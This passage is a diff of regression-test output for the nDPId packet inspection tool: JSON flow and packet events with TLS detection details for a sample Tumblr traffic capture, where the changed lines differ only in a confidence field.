-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} -00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00674{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": 